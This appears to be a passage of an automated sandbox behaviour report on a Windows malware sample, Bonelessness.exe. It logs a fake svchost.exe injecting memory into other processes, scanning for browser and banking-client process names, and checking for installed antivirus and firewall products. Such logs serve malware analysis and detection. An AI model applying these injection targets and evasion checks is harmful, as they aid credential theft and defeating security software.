      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B70000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B71000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B72000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BC4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A24000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2250000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2251000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2252000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 22A4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1004000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2551000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 25A4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E04000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 834000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DF4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1460000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1461000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1462000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 14B4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2900000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2901000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2902000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2954000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2434000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E04000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D20000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D21000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D22000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D74000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1560000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1561000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1562000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 15B4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 3234000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 3234000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02D37300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_028A7300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_02457300
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_012F7300
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" Jump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeFile opened: CA HIPS KmxAgentJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeWindow found: AVP NULL ____AVP.RootJump to behavior
      Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
      Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
      Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
      Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
      Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
